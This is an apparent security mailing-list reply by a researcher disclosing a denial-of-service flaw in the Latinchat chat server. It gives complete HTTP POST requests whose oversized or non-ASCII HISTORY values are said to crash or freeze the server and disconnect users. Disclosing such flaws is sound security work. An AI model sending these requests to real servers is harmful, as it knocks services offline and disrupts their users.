<<< Date Index >>>     <<< Thread Index >>>

Re: Latinchat Denial Of Service



Today this vulnerability keeps on existing in latinchat but with certain 
difference.Instead of request: 

POST /JAVA HTTP/1.0 
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows 98) 
Referer: http://www.disp004-org.latinchat.com 
Content-length: 142 
UserName=mynick&SessionID=C17d808043&TEMPLATE=2&RoomID=R34_3-1&HISTORY=999999999999999999999999999999999999999999999999999999999999999999999
 

the user can send other request using ASCII  characters, for example : 

POST /JAVA HTTP/1.0 
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows 98) 
Referer: http://www.disp004-org.latinchat.com 
Content-length: 142 
UserName=mynick&SessionID=C17d808043&TEMPLATE=2&RoomID=R34_3-1&HISTORY=ر«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±
 

by sending this request to the server, it will crash. 

Another request that freezes the server has following aspect: 

POST /IN HTTP/1.0 
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows 98) 
Referer: http://www.disp004-org.latinchat.com 
Content-length: 142 

using this request  the attacker can boot  certain quantity of users at the 
same time and the server remains frozen until the attacker does not stop 
process of attack.And in this case it does not have a lot of importance what we 
are going to put in variable of history :
HISTORY=ر«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±«»Ø±
 

or 

HISTORY=999999999999999999999999999999999999999999999999999999999999999999999999999
 

the result will be the same 

Researcher: Vitto Makarsky